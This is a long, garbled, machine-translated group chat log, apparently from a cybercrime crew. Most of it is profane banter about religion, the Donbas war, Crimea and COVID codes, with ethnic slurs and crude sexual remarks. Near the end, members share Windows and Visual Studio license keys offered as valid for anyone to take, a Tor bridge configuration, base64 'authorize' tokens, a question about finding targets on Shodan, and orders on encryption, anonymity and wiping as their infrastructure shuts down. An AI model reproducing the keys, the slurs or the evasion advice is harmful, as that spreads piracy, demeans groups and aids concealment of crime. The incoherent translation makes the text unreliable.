Open up. Brent, you just gotta live like a human being, whether you're a Satanist or an Eskimo, I don't give a fuck. Just don't do shit. I feel sorry for you. Bro, are you a coder or what? You guys are all crazy. I feel sorry for you. But let's educate... There's no other way, alas. Allahu akbar! Hallelujah! Where the people are in the head, God bless us. Everything is fucked up. I forgot the first of May. Don't anger God. Okey dokey. Stop it. The idea is outdated, politicians need to invent a new pipe. Don't go on. Money solves everything. Shut up. Angelo, they're all about this memory. I'm tired of this on May 9. Now, no rudeness. For Efrain, money decides everything. And what? I would like to see what the schoolchildren who raised 200k bucks on NFT told you) They got so proud that we remember him better than anyone else. Who does not remember the past has no future.)))))))))) Anyway mankind is stepping on this rake and will continue to do so. It's God's way, why think about it? https://www.youtube.com/watch?v=Pugewp5ROCk&ab_channel=NoguSvel%C3%B3%21! I'm sure Mark Bernes is not talking about anything. Everything, Efrain, run to hell.) Can I get the original? Listen to it. It's a murky topic... the evil on earth. And what did he get out of it? An 8k car? Is it his?
Learn it by heart! I'll read it to the kids, but for you: what's the top? Although Jesus would go to jail for insulting believers, easy as two fingers. I say that he should do everything for people if he went into this field, and not profit from it. Jesus taught a little bit differently, crack the church up. Efren says that the priests fuckin' love good cars, Angelo says) Kucherovo. Are you being sarcastic or not? They're washing away your sins, fat people, they're carrying your cross as if it's something bad. I've been to funerals 4 times this year; for 2 of them, priests came in 8k cars. + We need to start shorting, the bitch market reacts to shit lightning-fast and the market panics, but I don't remember it - once a year or every year? I'd rather donate to a zoo shelter. Why panic? Considering the fees every year, they fly Robinsons, pfft, so that their Rennies are serviced properly, yeah right) You have to take your dough to the ROC. Wait five years; if prices do not fall, I'll go abroad to live without making a difference. So everything already costs a lot of money; buy urgently what they want to buy, a buck at 80. So our rusty pierced helmet - does not pierce the helmet, do not fuck with a crutch or a McUA, better with an AWP) I would shoot with a Kalash. I can not give guns, I fucked up (pills again, did not drink). Who has a military ID? I remember a patient in surgery uttered a vivid phrase: if I didn't know what they were treating, I'd think they were fucking.
Angelo, believe me, you should take care of your ass :D You should ask me) I promise you. Guys, by 70 we'll all have it. Alcohol, smoking, there's more than one reason :D I heard it's from sitting on your ass, so I mostly try to lie down, so don't piss; sportsmen commonly have it, and before 25 I had a brother at 20 who got it from a snowcat. Artery. No, not a gut, but a vessel. Pfff, I don't recommend it. Aha, a gut from your ass, when your guts come out? Hemorrhoids. And hemorrhoids are what? If that's what they were talking about in the show with that stupid cunt. So, the idea of sticking it up your ass with hemorrhoids is not a good one. I haven't tried it. It's been around for 300 years. Does it help? Angelo, you poor fuckers. I mean, the cucumber idea is not new. It depends who I stick it in their ass, and squatting on a stump isn't. Cucumbers? And not like that, not that :D Not that treated.))) Need a voiceover from Drozdov. Some cats and shit licking. He's a cat's ointment. Pick a term yourself. Without the nastiness, or something. I'm happier with the women over 50. They smear pussy like ointment and cats lick it. Yeah... but who was being rude?) Yeah, I didn't see that, he sucked off a dog? Guys, guys, no rudeness, please. Sniffles. What are you looking at?
even i couldn't think of such a thing, don't sweat it, i'm 16 years old, i don't fuck with you)) and i remember the dog panin, i think you can do a lot in life like i do when you love kids) take them away? it's good that i did not get like that) (and when kids, it's fucked up) i love you, and i've loved you for a long time. what example are you setting? Angelo, do not be like that. Especially when talking about love. I realized there's no buzz. I lost interest in them at 18. I'm not a member there. Whores in general are pfff, when elections @efrain what's in a man's state? 50, you're 30, 40, fuck, and then there's passion. I agree. There is no point. Then all the fadebersamurai when every touch gives you a discharge is temporary) when the heart beats like an engine not thrown too little And we just make money ...)))) sex better to pay a woman right away for sex than pay all your life) our artillery will support you, lol Stop. it's you - cyberhoppers. :D come here, now a trojan huyachu Support me, brothers! we are cyberhoppers bababobs zloty we are not about love feelings - chemistry How not to believe in love?! It's like not believing in chemistry or what kind of love do you mean? I love my family, but not chicks! Paradox! I'm just surprised at the man who works with us and does not believe in love! It's your second nickname not?) I eat plov What are you doing? I do not have you) And in the toad? Just over a year, probably a rare bird in the chat room) How long with us? What do you want to ask? I have not seen you. Efrain, and you who? egoism in its right understanding believe in yourself, love your family, and the idea....and the idea is happiness Fucking hell. there is no love only faith in yourself and the idea is No thought about it? And if faith, the idea and love? there's chance, luck and fucking random Yes, my friend, me too. you know, i'm sick of fucking burying people. i'm afraid to even discuss it with you. oh, angelo, you are so wrong.
you should have asked him more about personal matters. yeah. we got one thing going for us. We stimulated Kermit....promorgaltam how god rested 24/7 more work will work in their eyes, you won't be able to sleep better in the live we certainly do not save anyone if there is no phyllox) somewhere there) in the ads on youtube you can look there about god just don't talk about god? onco crushed their eyes? for kids? maybe he was in the onco dispensary? no bro, we all ate, some less, some more. i'm serious, but you just want to laugh. easy exchange for their selflessness. people are getting stabbed by doctors you give him a red bandage) Guys, go to hell. Please. My war is over Yes, only I could not survive. I rembo imagine someone at 15 dying without a scar. Well done Che, survivor) I do not have a living place on my body. I'm covered in scars. And I remember exactly the day and the hour when I stayed alive. God is a pill! woPutin God + Putin God what does that have to do with God? I'm alive. Prove it to me, there is no god. There is no god. There is no god. Patriotism and faith is propaganda? What-what? I saw the BLEEP! So you understand that patriotism, like faith is a propaganda weapon I had the Union collapsed before my eyes. Well, I'm 45 years old. I'm fucked up and they've got glory and honour. I've got poverty, people are under 30. I only rely on my eyes. Where's the poverty? What experience do you draw on? Poverty. What do you understand by fucked up? Sorry, if it's ..... Angelo, honey, how old are you? When half the country is prescribed Kagocel and Arbidol when people talk to me about external enemies I don't get it in Krasnodar, more in Moscow...) We can do it ourselves, why should anyone conquer us? Yes, don't worry, the mortality rate exceeds the birth rate, we'll die out in 15 years. Right, that's why they do nasty things. The Brits.
You can't see more than 10K died in 14> Madness!!! What do you know about madness? What brothers? Madness!!! God damn it, are we going to shoot each other for the Brits' pleasure? I agree. I don't know anything about yours. Our grandfather is crazy. I don't know these fuckers. There's some artillery fire on the front line. It's not the front. Children and old people. Refugees went. The Rostov region governor asked for help from the federal center. What's up? I'm not following. Have you seen the nightmare on the front line? I approve. We love it too. Sorry. Otherwise we'll eat it ourselves. Give me the address. We'll find it. We need to find Droop later. Give me the address. Why so serious? I'm joking. Fuck, send the lard. I love lard. Think what you say! A Khohol is no brother to a Moskal. Our people here. Anybody has objective information on the line of contact? Friends. Brothers. are there any khokhli besides me? and to you, colleague, have a nice weekend, comrades! well, you don't need a garage for that, it exists as a picture in nft only there are no hookers and your friends fuck you?) ew ew ew there is only one minus to fuck hookers on fufaikes with your friends to make a kopeck while your wife is home to drink samonat shits behind them there is no cellar does anyone care about that? You can't help but be interested in it. It's a great idea. You just need better control. There's no need to change the system. They turned people in like dogs. They told us to fuck off like robots who are supposed to work for us in the capitalist world?) Big bugs in short, I saw the movie "Big Bug" today, we need communism. Communities need it, they are cunning, they quickly build one-person policies.
Anyone interested, please write to China and pray for their dough. I'll sell my garages so we won't have to carry our own fucking burdens, we'll take it over with us brothers, or there will be no more 3 million people there in a couple of years... 300 LNR with passports 400 with passports 700 thousand people are in the LNR and women and children in the first place Now the LNR population is much larger. Do they plan to evacuate only those who have passports? Checkmate, statistics show that there are 700 thousand people planned to be evacuated. And there is a circus in politics - I make money and live in the middle of bullshit - the media are bullshitting our people, everything is bought and bought back. I was wrong. The evacuation is true. Yesterday I saw the news about the evacuation, but it was disproved. Mutual! All in peace and have a nice weekend! @elijah write me http://ria.ru/20220218/vzryv-1773661617.html thanks Kermit, this is all information terrorism, there are no evacuations or explosions. Only the usual shelling of the territories bordering with Ukr. It has been going on since 2014 without changing. What about the explosion in Donetsk? Kermit thank you! #Luck only dreams # As they say, but not like this, it is for us Have a good weekend Kermit you do not understand, I am leaving you guys for the weekend. good luck and profits to everybody! what did you take? a spear for a house in the neighborhood, that's life. what did you take? i'm out of the way. you could do a lot of it, it's not fair. in the wild times.....we earned what we could :D My parents paid me until I was 16, so you didn't explain how you can earn money to rent a house when you're 14. We're so eager to get a job @kermit Keeping us out of Chechnya without a job. They're so fucking eager, no one wants to go to Russia.
No one has told me about the job, yesterday the router died, but i got a substitute as always i restored the city i saw yesterday, the DnR announced evacuation at gas stations etc. i have no button B here i bought not a keyboard i'm a fuckin queue right now a guy wrote me in some city of the DnR announced evacuation of the city but i don't write it i don't offer it angelo aha the face and i would write a list you fucked up something?00You were earning good money at that time, how can you make money when you were 14? Kids are good now, they can do webcam, it's bullshit, tell me more, I'll say no more) I've been earning money in KC, now I need everything in life and where did the money come from? You were 14, fuck it, I was 16 and rented a house and lived) At 14?Do not live with your parents! Kermit, we move our parents back and live our lives like 50 years + not kermit it's not bad, we get it, do not worry, I have changed my keyboard, I write here as it is)))))*kermit what parents kermit?look how good you are now a parent should offer a choice, give the whole range of dovolvozhennym not impose their own with some fucking fantasies they live in their narnia never know if seriously do not know at all a parent rarely knows what is best for the child it sucks and you have a choice so I had no choice that my choice worse than yours that I did not right at 14 years I did not decide fuck all right?thanks to all my friends !!! you really lan)))) go tell my parents that @mitzi congratulations you fucked up the most fun !!! @mitzi health little guy !!! what were you doing at 14 years old kera, jesus chilo> and you looked handsome and the acetone pilsilmilo damilo))) named mashkaa and he was born half-dead and right February 14, handsome, I had a fiancée here I'm a grandfather but a fucking weak kid but we'll do anything to live no smiley faces. i remember acetone for a bet. 
....lolbikes fishermenda storytellers you fuckin' swallow like a konya thought, you mutant me such men somewhere stole a sign "working hours from 9:00 to 22:00 "then the burn the main thing is not to inhale pokhutil blin 97% still ahahoge happens a how could you clean drink here I have other non-Russians cough all) pokh who you are and what covid will do his problem moving in time azatoy other problem is solved clean pils do not help Not that you drink.. There's men outside the window getting hardened, every day at 90 degrees and they don't get sick! Everybody gets sick with fucking prz <- 130aacermit snot flowing then fucking coughing snot and runny throat? i got everybody sick, i fucked up with a phaser, half a year not omicron yes here micron, we got 35smag and fuck up stafaeday you're an inventor ) Put up a picture in the nft sale where you can see the private key of the bitcoin wallet. This is a way to whitewash ) Merch ru cybercrime and write nftoooo, in the theme of air "air to sell" Well by the way yes))) Fucking hell. they'll give you emission quotas. lol Decarbonizers generally took the course against the economic stability of many countries What about reasonable from an economic point of view - yes.) so it is smelted, not smelted from ore - Izya! What's going on in Ukraine? - Seema, it's a complete madhouse! Russian troops surround a Ukrainian military unit and shout: "Surrender!" And from there they say: "Russians don't surrender!" A somewhat sad anecdote Metal has long been melted by an electromagnetic field. Well, the course towards decarbonization does not cancel the need for it for production processes. Unless power plants and other places will get rid of it. But for example in metal smelting there is a lot of it needed and there is simply no way to do without it in a reasonable (from an economic point of view) way.
But the world movement is now on decarbonization. Coal is a great resource, mined by cheap miners in the Donbass, but no one needs it for fuck's sake because of the course of decarbonization. So there is no more than a buffer here. to take something else, deal with what's left of the factories, I think there is only one foundation left). #https://www.youtube.com/watch?v=pUCPl_lt2K8 # *By the way, they make starch from potatoes less often now, because it's more convenient to make it from corn. By the way, Lida beer is cool. Although it's not beer, but it's the coolest in the heat. Especially there's beer that tastes like kvass, but strong fucking planesybir* from donbass to sydir so taka steelworks we have in siberia zavod there's a lot of defense industry left over from the USSR a I like brie well I dunno where to get it. I just remembered the news that the dnr was selling it everywhere and there were buyers. There's great coal for the steel industry. That's why they used to take the ore to Donetsk region for smelting. on the collars, the oselomersy cheese brest lithuanian Where did the starch from the potatoes go? shrimp and only potatoes and that shit is awful isn't it? that Hamon i can't see to death the fucking miners from dnr and lnr ready to die in mines of the great empire? what the fuck is the price of delivering a video, not like your static videos. where to deliver it? @gelmut what the fuck from dnr and lnr? yes i remember it). something comes to mind. by the way, i still have a video from ascii symbols - a moment from the matrix where neo dodges bullets. It was very popular about 15 years ago. Quit...I have more !ha !wo........................................."--~*'¯.......' ......................................
("-~~--"¸"¸"¸Ã'Ì ....................................-^"¯ : : : : :¸-¯"¯/' ...............................¸""-^"¯ : : : : : : : '¸"",-" **¯¯¯'^^~-"""----~^*'"¯ : : : : : : : : : :¸-" .:.:.:.:."-^" : : : : : : : : : : : : : : : : :"-" :.:.:.:.:.:.:.:.:.:.: : : : : : : : : : ¸"-^¯ .::.:.:.:.:.:.:.:. : : : : : : : ¸""-^¯ :.' : : ' : : : : : : : ;¸""-~"¯ :.:.:: :"-"""***/*'ì¸'¯ :.': : : : :"-" : : :" .:.:.: : : : :" : : : : , :.: : : : : : : : : : : : 'Ì : : : : : : :, : : : : : :/ "-"_"_::::_"-*__""~"pigeons, bums, ugagde this is all friday pre-paid gambling waiting? We are just warming up, before serious conversations why are you starting to get sad in the evening?In border settlements, almost everyone has relatives "on the other side." I thought they were thinking with their heads, not their asses. 1) a buffer between Russia and a potential NATO member. 2) There is a lot of good coal there, and the main thing is that it is close to Russia, not in the arsehole of the world like Siberia 3) In fact the whole population there is Russian-speaking. In the DPR they speak Russian better and more often than in the villages of the Rostov Region. 4) The access to the sea is bullshit, the Azov is a swamp, muddy and shallow. The seaside infrastructure 10 years ago was in complete shit. P.S. Every summer I was in the Donetsk region and saw exactly what the fuck was going on there. Everywhere you went there was devastation. After the Soviet Union, perhaps only when Akhmetov took everything into his own hands (bought it up) did it begin to prosper. 
I don't give a fuck who you are, whether you are a lip-smacking nigger or a cheeky Khokhol or an Asian with a stupid penis - the main thing is that you are a good man, he covers his shoulder straps, but you guys are just between us.the main thing is not to go to waa, you will see turtles and whales and the endless space!i'll wait for the train and go to the edge of the universe i'll go look for a box at the train station and fight with the homeless for it i'm always on the topic@thomas got the joke) and that's it, toby the cunt i'm in barscajah no allah is there i'm just there the earth is round tell you what to say, i'll get fucked like a mad dog tomas you say that in saudi arabia some guy remembers a joke where there are corners?it's round... what do you guys do, take a yoghurt and go to sleep... they said you can find a job anywhere in the world... they said choose who you want for organs... you know what? or fall into space... if I hadn't burnt down, I would have taken a job as a truck driver. and I would have fucked around the desert in a truck... what would you say about that?otherwise everyone in australia would have fallen into the sky and let's just say the earth is not round let's be broad-minded elephant trunk it doesn't matter what it is it's a dick so you shouldn't make any conclusions before you get there or lying there? they told me in church she's standing on a turtle don't you know? Why "or"?) @thomas don't escalate. 
we don't need a chorus or flat we need to protect the moon from nat bases ahead of space...only earth is round...and then if we take a new territory to shit there because we're an empire to shit where we live I don't like our relationship don't believe in love at a distance why aren't you there? I like Gelendzhik and the whole Krasnodar Territory, it's fucking great there, you fucking pigs can't live in shit, people can't do anything right, they've fucked everything up. I like Crimea, it's beautiful, so shut up guys, fuck your Crimea, I have not lived in Russia for years and I am fucked, I remember coming here for posts on FB, summer is coming soon. Why do you need a crib? I told you that I didn't need a crib in Crimea. I got a bad Internet connection. I don't need one. I understand our tools, like Peter the Great - fuck off and earn your own fucking money. But you have to pay for your food and rent! Oh, stop flirting with me and not Ilona, I'm not ready to talk to anyone, Angelo should be put on the phone and let him represent the Savings Bank. the moon and Mars, phobos and demos - all russia :sunglasses: i will not say about israel, but in california fort ross was exactly noticed Kosovo is serbia Damn it alaska, when is the payday guys? @frances But kosovo is not russia, pray for the leader! The Maldives and Israel! This is Russia)) You are out of your mind, people in Crimea are worse off. It's true, we'll all be locked up fast for this kind of talk. 20 years, our cops will always find something for 5 years!
Frodo is a halfling with hairy legs %) fuck everything he was suspected of making explosives and found gunpowder that lida there it's not just about that lol `https://ixbt.games/news/2022/02/18/kibersportsmenka-zayavila-cto-u-muzcin-rostom-mense-170-sm-net-celoveceskix-prav-a-lgbt-soobshhestvo.html` Dominated, 5 years 5 years was given to a teenager 16 years old guy against a saburbon in general I got fucked up by the news recently, dude in Minecraft mined an fsb building frodo normal dude under a chevy suburban not all midgets are bad midgets and dick in dreams under a ford bronco n cunt hear the dwarf people with small stature always have problems with their loins - grandpa forgot to take pills, so he gets mad. it's just like they wanted people in the Crimea are living worse. people do not need Crimea. people eat less. it's cheaper to go abroad to rest. What the fuck is the dnr and lnr krym being deprived of it and what's the point? i don't fucking believe it, i don't want to go to the sea. it would be fucking better if the maldives or the caribbean were deprived. in empires you do not ask questions like that. there are no activation keys for 10 kilometers? i found my activation keys, they all valid, go ahead and take them.

Windows 7 Professional with SP1 - Windows 7 Professional with Service Pack 1
```
PKeyConfig : Win 7 All
Key : XF69Q-T9G2R-VVWCC-FG7QY-DGXM2
Key Status : Valid
Product ID : XXXXX-034-7568835-86136
Extended PID : XXXXX-00172-034-756883-03-1049-7601.0000-0492022
SKU ID : 9abf5984-9c16-46f2-ad1e-7fe15931a8dd
Description : Windows 7 All Volume Editions Volume:MAK
Edition ID : Enterprise;EnterpriseN;EnterpriseE;Professional;ProfessionalN;ProfessionalE
Sub Type : X15-39049
License Type : Volume:MAK
Channel : Volume
Crypto ID : 172 (ac)
Activ. Count : 13
```

Windows 8.1 Pro - Windows 8.1 Professional
```
PKeyConfig : Win 8.1 RTM
Key : TWJG2-NX794-PF3P3-THKYW-29WK3
Key Status : Valid
Product ID : 00261-80362-90494-AA837
Extended PID : XXXXX-02618-036-290494-03-1049-7601.0000-0492022
SKU ID : 354d964a-56e7-43c5-a93f-287a7a750bd4
Description : Win 8.1 RTM Professional;ProfessionalN;EnterpriseN;EnterpriseN Volume:MAK
Edition ID : Professional;ProfessionalN;Enterprise;EnterpriseN
Sub Type : [Blue]X18-95503
License Type : Volume:MAK
Channel : Volume
Crypto ID : 2618 (a3a)
Activ. Count : 50
```

Windows 10 Pro for Workstations MAK
```
PKeyConfig : Win 10 RTM
Key : 9X72C-WNHPV-4683W-PGQYF-YTDGY
Key Status : Valid
Product ID : 00331-20021-51452-AA212
Extended PID : XXXXX-03312-002-151452-03-1049-7601.0000-0492022
SKU ID : 49cd895b-53b2-4dc4-a5f7-b18aa019ad37
Description : Win 10 RTM Professional Volume:MAK
Edition ID : Professional
Sub Type : [TH]X19-98796
License Type : Volume:MAK
Channel : Volume
Crypto ID : 3312 (cf0)
Activ. Count : 38
```

No, with nuts, you'll get sick of them in 10 minutes, you'll have to get nutmeg from @gelmut and today I dreamt about a redhead, I didn't want to open my eyes But the budget is limited, no money for Lsd I want chicks to dreamtttttt only Lsd will help And you told about it You dreamt how to clean it all do you want more?) Two weeks ago I woke up because the VPS is dirty I dreamt about detekts That's easy, just think about work))) @elroy but keep thinking about work! You broke your mind and think about work from your apartment, where the money is?)) You do not need the key to call of duty vanguard, you do not need the key to ..... ))) :rofl: okay, I need a key for call of duty vanguard No all, unfortunately he has everything! Visual Studio 2022 Enterprise: VHF9H-NXBBB-638P6-6JHCY-88JWH Professional: TD244-P4NB7-YQ6XK-Y8MMM-YWV2J Express never screams 2019 and 2022 I have VS22 Enterprise. I gave her the key and ok. and let's you give the key to Enterprise? who uses VS22 Express?
after how long it starts screaming - "register me"? thank you for your attention Well, yes, the bug corrected the fundamental) masseur Ka I do not Yes. Here I agree with you)))) and masseur personal with our profession needs a maxibar :thumbsup: better the mini-bar as it is convenient, I have a mini network at home But why> I pointed my own bridge in the browser I do not get without vpn, apparently the provider blocked poblozhnyutsubtu only with snowflake but very slowly windows + vpn + tor. Googling may know under ubuntu I unfortunately do not know the settings that I threw above for my bridge with the settings above tog bundle should be run and not tor browser how then? had to turn around myself snowflake at me barely works, I can not even come here to chat with her everywhere I asked in the tor browser, on the site and on telegram. It only works with snowflake. i've been pulling this lollypop for 2 days i just copied it in the folder somewhere in my browser ServerTransportPlugin obfs4 exec C:/Users/user/AppData/Roaming/tor/obfs4proxy.eheya in my browser i pointed my own bridge:) you do not understand me, i myself requested the bridge settings on torus? i think i should get it from the torus site, but they are all broken there @homer but where to get the bridge? .168.1.153 -> you have a different ip in your subnet understandably, or localhost m interestingly it is config? and in the settings of the torus browser -> specify your bridge: 192.168.1.153:5600 if you are interested, here is my torrc, maybe someone will need it

```
SocksPort 0.0.0.0:9050
HTTPTunnelPort 0.0.0.0:9080
GeoIPFile C:/Tor/Data/Tor/geoip
GeoIPv6File C:/Tor/Data/Tor/geoip6
BridgeRelay 1
ORPort 5600
ServerTransportPlugin obfs4 exec C:/Users/user/AppData/Roaming/tor/obfs4proxy.exe
ServerTransportListenAddr obfs4 0.0.0.0:5601
ExtORPort auto
ContactInfo no@name.com
Nickname Noname
```

torrc file is there? There's probably not much difference. I'm on Ubuntu. How do I configure it for the TOR bridge?:) What OS?
WIN 10 What's your server on? My internet was down yesterday... I couldn't figure out why... for about 10 minutes. Turns out I knocked out the router's power with my foot :grin: hi, everything's fine now... I had it last night... I had to use a torus bridge to configure my torus browser. It all worked. I had to start my server with torus through vpn. I just shut everything down a couple of days ago. Does anyone else have a toad that's been acting up? It always shuts down for me. And I have to plug it in manually all the time. It's most likely the torus...there's a chance the next paycheck will be more in bits...ok, is it ok? does anyone here know how to build macros? I saw the same thing yesterday. Not only that, in the middle of a conversation disappeared otr connection spontaneously, turned on, it turned on, but the messages without the keys. admins, check the chat mages I have only one input or do you have S3 Trio?) yes to any one and a total of 4 monitors can connect to my video game 4 can connect to it 3 display ports and 1 hdmi I have an old gtx1060 now to buy a graphics card, you have to sell your kidney and where to plug it in? where do you want it? - left - internet and documentation, middle - development environment, right - all the chats (I have more than one) monica monica, suck the elephant's dick. fuck, i remember the song (for the chat, buy a 3rd monica. i also like two monicas from developers..blogger me chat on a separate monitor and I always see you all)) I have the sound off it was a check for online :rofl: thx) yes, in place it @all but where is the menu to enable apr is missing? no, all normal redmine lies? @lawerence knock @collin this timlid on the BC.
He will tell you how to do it. gosusluzhba - the national heritage (c)) Some archive is thin. what is it?) I just wondered if their archive is 7 gigs. everything, you can fine your neighbor in gosusluzhba for fucking parking in front of the house (which is impossible to walk with a baby carriage), for 5 million rubles))) ahahh http://habr.Com/ru/news/t/598121/ so yeah VS 2022 came out or what? thx+ping pull - normal. @alik me too ok, hi Git fell again? ok dudes, We need to remember about the Russian mountains and the Belarusian sea :laughing: eblinkin? or american mummy? or that bloke with the fucking haircut?) where does the troll live in a cave under the mountain...fat green dick)) Putin probably gave him a whistle in his, and HERE is this clown? Psaku's duking it out? :joy: aada he was fucking playing with his dick :joy: at points like he's disturbing your life or something like that from his non-voter, so what are the complaints about zelensky? `https://pbs.twimg.com/media/CqhlI5ZXEAAnETF.jpg` @Garfield even under Yaatsenyukh who got money and got the fuck out, he dumped everybody and Kuev) the fuck you are doing for other people's money he earned his conditional billion and he does not give a fuck about anything now)) and the shit that is going on now started back when Powder started, if such a drunkard is fighting the house I can send a couple of ties :laughing: I think he looks nice you are not a resident of ua what can you say against Zelensky? It's better to be a Stalinist than a Zelenist :joy: Noah screwed up this ark better to sink it Each creature should have a chance to get some. Are there Stalinists here too? Stalin is a sucker! What's wrong with what I said? Or has the Eurocyclone got a couple of years to spare? What did I say? The flies are not ripe yet What's wrong with me? What's wrong with you? Kermit, what did Angelo treat you with? Crimea is Ukrainian! The LNR and DNR are Ukrainian land! @bennie the toad is blocking requests due to lack of authorization.
pokat forgot to slova ukraina! and some good coda to me too silent) i promise more russophobia and anti-soviet if there is my contact. pinging then it's about zhabochete not alei threw requests to him, on requests @bennie something your toad is not alei, let's all be accurate! All my friends, I was glad to work with you, everything will be fine, see you soon! And yes @bennie is gaining a team, who knows him go to his chat room @demetrius request to disable the removal of the PS and general chats for more days, there are people who are on vacation, etc, let them read During understanding, our given infrastructures live, the last days at best 1-2 days, make backups. Remains to exchange cats who's with who, Friends do not lose yourself Piss and fuck our wars with our brothers, Next we'll do everything, I'm writing from the English keyboard and typing by memory, sorry for the errors) No wagons and all sorts of shit, toks as a priority So, friends, swap pals is the rule! OTR, PGP, socks, do not deanonymize ourselves and their own, in the twist here new contacts do not throw, we'll all be fucked. Knocked from the freshly-registered toads as an example. We exchanged keys Deleted all!, further we sort it out ourselves. If you teach someone how and what to clean, then come to me, here in the L.S.
The artist there will be helpful to anyone? authorize eyJhbGciOiJB24fD44BRFvYYz5iboO/9jtdBrFJujpDAFJz6cMPFcMrxn3djYo0jxfOrE8RsjVSyjEiM1DKuZxcgmBk3kB3oVfoqDyZY5XNMxQ7KdqrMjy0NFcaxzS8EFQEDrMCPgCJZ5if0QCHshjMaTXFuJOEXEnXsF2RoGBabg6hofVOldlDTGtE7l8RBj36qScd1jenyNtNPbBZTTV/sjTEEkqySSTsqw7K1Ut+cS3gQ4Z2FWwIw/7nCXPKTqlprfRcXJ97uUIvqThcLB75rkzYer4+vKQ== eyJhbGciOiJBnvdSVWZVIAyb6BCHj+A030+3fY2BN5b5v+J7q41qgQ7np0ITFy93e5d6mnyau/iIBpsm+O3LwBT0bLOnkF0m5xj5Qzscl+9BvAwg9HzSjjwHdCImZfaxJ0AEm0n4kEx6rAPIIwoJfxQfTrN7srEIlC2HARIiDwuiYSDSS5VJq878AL6UxOILSllaFp/4L+12E4Zo2Z8ERV/BZzJ1JQLKjg== eyJhbGciOiJBYUFMMP1N653ZadUlgKxQ8yuV+oiVO039+I5VsvyqeMuRzC6ntne/mZAe20qnGNOKfyKVWkSmYaEea4tW5JvmWmD/sfQx3wqJ58g3XtmABSaWrW+pOsnME3hj5WDPsydAPKwjNFN4Za+OxPLJaRXSHmgtxlsAMrkB+VO1YdhsulU= ++test do you recommend? I'm sorry, but I'll pass.) i'm old school @angelo then get a 2 in one: SSDrapon :grin: yeah, that's a fun thing to do) >would get a hair dryer and heat your tubes fuck, I was thinking about the wrong hairdryer :D would have a hairdryer and heated his tubes corrsaira I would have assembled a water bottle) @weldon well in seccoe I am not as rare guest), but worth a prucha would take 2 and 1 gigabyte enough for you? :D tay not in surgery don't get it... so you in dns/rbts/kins or in a sexshop you take presents?) like among hvm they're pizhete all in general samsung is very fast 2 times slower than Kingston i have a satashny samsung SSD 860 EVO M.2 1TB haven't decided vaginaa I will take nvme Samsung 980 Evo PRo 1Gb vara SSD Kingston SXS2000 1 Tb USB-C ) guys all bought yourself a New Year presents?! and then all the rest! on my birthday I will be in the shit! here's the joy!
it's definitely something good)@angelo, the new year is coming :)write me something good too@kermit wrote in the toad youhslolt once and there were sellers on damagetobe buy, scrub some how to get buy or off?@all guys, and no one knows how to knock out an ak on shodan? will not write any addresses and urls in chatsnoskolno how much breadcrumbs to take? dry the oars? gy__________(") _______""""" _____ """"""" ___"""""""""" ___ (░░░░░░░)░░░) ___(░(░"░░"░)░░░) __ (░░(░░●░░░)░░░) __ (░░░░◡░░)░░░░) _""(░░░░░░░░░░)" _"""(░░░░░░░░░)"" """" ""(░░░)"" """ """" """"""""" "" """" """"░"""" "" (░░)_ ▓▓▓▓▌▓▐▓▓▓_(░░) ("") """"""""""" ("") _____█████░█████_▓▓▓\ _____"""""-,"""""▓▓▓▓▓) _____"""""-,"""""▓▓▓▓▓) ___(░░░░░░)(░░░░░) ▓▓▓▓) ______(███)_(███)▓▓▓▓▓▓) ____ ("""")_("""")▓▓▓▓▓) I hope it's a gimmick what's the santa clowns7)We'll wait for @silverWere you seeing this gimmick or not? what's the santa clowns newbies? @elroy have you seen it? hello all nightmins are on line here? https://siasky.net/LAAtPqyAbVU0FKTHc14xH1XNqDwNsvDwHKPPyhdqDc8Onwthx mate+test@ganesh pm me, plz!need to sell these PR_codes to Alla Borisovne even if 44*44 (that's the size at "2vvapvapyukekekgospichvaprasprsprlj4565675aprasprj445va") 4 milion) or laysag chips, or homer simpson so you can be a Philip Kirkorovma no limit there, and the world has 9 million combinations ?i'm telling you, my wife asked me to scan my code before entering the mall... I'm telling you, my wife asked me to scan her code before I entered the mall)... Then I saw a blue homeless guy walking around in the "diamond holding")) Oh, those bloggers...and the blogger went to 3-4 of these stores on the code from a pack of chips on YouTube there are videos where the guards check these codes just eyes blin skohil in KB, the receipt is the Quarkd, I decided to keep as a memento) I wonder, are there kuarov recognition from the screen, like screenshotilok? do not yuse smartphone, and directly from the computer screen? 
can mold everything you want! :) https://qrcode.tec-it.com/ru/Raw "it's scanned. Fuck you! WITH YOUR INOCULATION! All the institutions are allowed to pass! cuckold code is also normal, but not on the subject) yes! RIGHT! I read some cuckold at the beginning :) it's genius simple cuckold, good nameo, this cuckold is correct! by whom??? sick@all People. And where did @frances go with our wp? https://siasky.net/ZACZJ8vKDNK2f8Rm52fv-qbi_kuTbPk0GMz_dXA1RaDacQ looks like the cuar checker is only at Reuben's..gosudarstvennas hope they do not check by such links some abracadabra is scanned from this qr-codablin)) dr and name from the ball. the essence is that they ljivat left, but valid certificates eto androlf) dr adolf not January 1 for sure i do not have a cell at hand, but this quarry checked as valid for adolfa they have all normal with signatures) well, we have the usual string) like the URL of some site mai gans ... wake up my dads :grin:what other cert, everything is generated by the usual string, ideally, the cert to generate these kuarabinen all factored in?i think they leaked it to a private private))) security certificates*scha, if i can find the link, krch in the netherlands leaked certificates for vaccination data, and there is a cuar code for adolf hitler with the status - valid certificateWhat we used to live oppressedThis is bad...i mean qr, not about the oppressed state of the russian people in the state) I think this has been part of our firmware for a long time nowNo one has not invented a solution yet ) I think that it will somehow resolve itself when scanning the system )The qr code when scanned gives a link to the article about the Nuremberg Code in Wikipedia If you are asked for a qr code in the street, show this picture: https://siasky.net/JABaAaKwcf5LPhw_QPltQXIzL_YXPZS_LUk1b_I-8Fr1Ug oligarchize) all "popular" companies like even Gasprom, 51 percent, have long been not ours, not that it is not popular.
They have no erection, they just do what they say, we are a colony. What will they do when our Vanguards have an erection for the U.S.? Maybe they will make war quicker for Malthusians... If condoms are bags of glue, then all the junkies in condoms used to stand in the basement...)) Remember that? Yeah, like in the 1990s But the blitzkrieg was a failure, people are not buying any "protective" measures. Now the pro-Western bureaucrats will think of workarounds to implement Malthusian ideas. The question is how quickly it will be introduced, only with a large number of violations of the law. Well, it will be soon, and only in a different format) More movies than my children put together) Remember "Kin-dza-dza") We will install the bells in their nostrils :laughing: There was a cyber punk movie where people changed each other's eyes. Then I saw a winter hobo in the ass, just walking around the mall, my wife somehow scared me... I thought they were gonna swab my ass and take a sperm sample. how fast will it take to implement and it's already been implemented? So they ask for a passport, and some people take a photo with a passport[ 